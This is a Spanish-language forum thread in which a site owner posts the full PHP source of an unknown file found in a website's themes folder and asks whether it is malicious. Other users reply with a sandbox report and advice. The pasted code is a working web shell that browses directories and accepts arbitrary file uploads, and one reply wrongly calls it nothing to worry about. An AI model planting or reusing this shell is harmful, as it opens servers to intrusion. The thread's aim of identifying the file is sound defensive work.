Identificación de Archivo Desconocido en Servidor

ramonjosegn

ramonjosegn Seguir
Seguidores
12

Sigma
Verificación en dos pasos activada
Verificado por Whatsapp
¡Usuario popular!
Desde
14 Feb 2010
Mensajes
70.587
Me topé con este archivo en mi servidor, no sé si es un virus, un archivo de caché o qué...

El archivo se llama ez3r6r.php y estaba en la carpeta de THEMES (un sitio un poco raro para un archivo php no?)

El contenido es el siguiente:

<?php
echo "<html><head>
<style>
body{background-color:#111; color:#e1e1e1;}
a{color: #999; text-decoration:none;}
a:hover{text-decoration:underline;}
input,textarea,select{ color:#fff;background-color:#111;border:0; font: 10pt Monospace,'Courier New'; }
hr {border:1px solid white;}
</style>
<script>
var d = document;
function g(c) {
d.mf.c.value=c;
d.mf.submit();
}
</script>
</head><body>";
echo PHP_OS;
if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN")
$os = 'win';
else
$os = 'nix';

$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
echo "<!-- <td><nobr>Windows --!>";
echo "<!-- g('FilesMan','c:/') --!>";
}

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode) {
echo "<!-- Safe mode:</span> <font color=#00bb00><b>OFF</b></font> --!>\n";
echo "<!-- Safe mode:</span> <font color=green><b>OFF</b></font> --!>\n";
}


if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';

echo "Path: ".htmlspecialchars($cwd)."<input type=hidden name=c value='".htmlspecialchars($cwd) ."'><hr>";
if (!is_writable($cwd)) {
echo "<font color=red>(Not writable)</font><br>";
}
if($_POST['p1'] === 'uploadFile') {
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))
echo "Can't upload!<br />";
}

$ls = wscandir($cwd);
echo "<form method=post name=mf style='display:none;'><input type=hidden name=c></form>";
foreach ($ls as $f) {
if (is_dir($f)) {
echo "<a href=# onclick='g(\"".$cwd.$f."\");'>".$f."</a>";
if (is_writable($cwd.$f)) {
echo "<!-- 'filename.php','chmod')\"><font color=green> --!> ";
} else {
echo "<!-- 'filename.php','chmod')\"><font color=white> --!> ";
}
echo "<br />";
} else {
$files[] = $f;
}
}
foreach ($files as $file) {
echo $file."<br />";
}
echo "<hr><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=c value='" . $cwd ."'>
<input type=hidden name=p1 value='uploadFile'>
Upload file: <input type=file name=f><input type=submit value='>>'></form>";

function wscandir($cwdir) {
if(function_exists("scandir")) {
return scandir($cwdir);
} else {
$cwdh = opendir($cwdir);
while (false !== ($filename = readdir($cwdh)))
$files[] = $filename;
return $files;
}
}
echo "</body></html>";
Hacer clic para expandir...
 
Pawel

Pawel

Dseda
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
9 Dic 2013
Mensajes
1.055
Si te apareció de golpe una solución es hacer una copia de este, guardarla en el pc y borrarla del servidor, el nombre que tiene es bastante extraño la verdad.
 
S

simpleweb

Gamma
Diseñador
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
20 Feb 2014
Mensajes
326
Estas son las funciones a las que ese archivo hace llamada cuando es ejecutado:

C:\DOCUME~1
C:\DOCUME~1\User
C:\DOCUME~1\User\LOCALS~1
C:\DOCUME~1\User\LOCALS~1\Temp
C:\DOCUME~1\User\LOCALS~1\Temp\cmd.exe
C:\DOCUME~1\User\LOCALS~1\Temp\cmd.exe.*
C:\Python27\cmd.exe
C:\Python27\cmd.exe.*
C:\PHP\cmd.exe
C:\PHP\cmd.exe.*
C:\WINDOWS\system32\cmd.exe
Hacer clic para expandir...

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\
C:\Registry\Machine\System\CurrentControlSet\Control\Nls\Locale\
C:\Registry\Machine\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\
C:\Registry\Machine\System\CurrentControlSet\Control\Nls\Language Groups\
Hacer clic para expandir...

Más datos:

File Details
File Name ui.php
File Size 2357 bytes
File Type PHP script, ASCII text, with CRLF line terminators
MD5 633bbb558afe9f108245b4c7a9c241af
SHA1 82dce1f12dfb47c41644116372caa1d5925bb5a6
SHA256 607b36251e3271c0a139ea445af1f7e862f74063c92590dded2b62940eb151af
SHA512 95c5b26eecf554f2513a41138be2d0cf93b1ff27cc2b54b1c177149894891d7cf11eec6d448594114993b92430d2f7504e5fc8e220662cd2ba705d1a5dec56ca
CRC32 DD871A1B
Ssdeep 48:3pzVzwZ+kDLPCsENaoY1IihjgHeGHojDP9SnNTaFGQlHlyP9l4xqIsWuDavP9Sug:5zVDNapEHvHoj7MNTqGOUzA1T3UB
Yara None matched
Hacer clic para expandir...

En virus total aun aparece limpio:

1.jpg

En principio yo no veo que tengas que preocuparte, pero puedes hacer la prueba que te ha dicho pawel. ;)
 
vicram10

vicram10

Épsilon
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Desde
8 May 2013
Mensajes
751
Edad
39
en realidad hay algunos themes que son descargados por internet que traen un archivo oculto dentro de sus themes para permitir subir cosas a el servidor donde usan el theme, ya me habia pasado con un theme de SMF que lo encontre por internet donde buscando carpeta por carpeta algun archivo raro me di con uno que te permitia subir cualquier archivo a tu hosting, y para saber que webs usaban el theme en el index.template.php del theme pusieron un enviador de theme cada ves que es visto la web..
 
christiancmc

christiancmc

Gamma
Verificación en dos pasos activada
Verificado por Whatsapp
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
20 Ago 2013
Mensajes
193
Es como dice vicram10, yo te recomiendo mejor que cambie a otro theme
 
Hay que estar conectado o registrado para responder aquí.
Arriba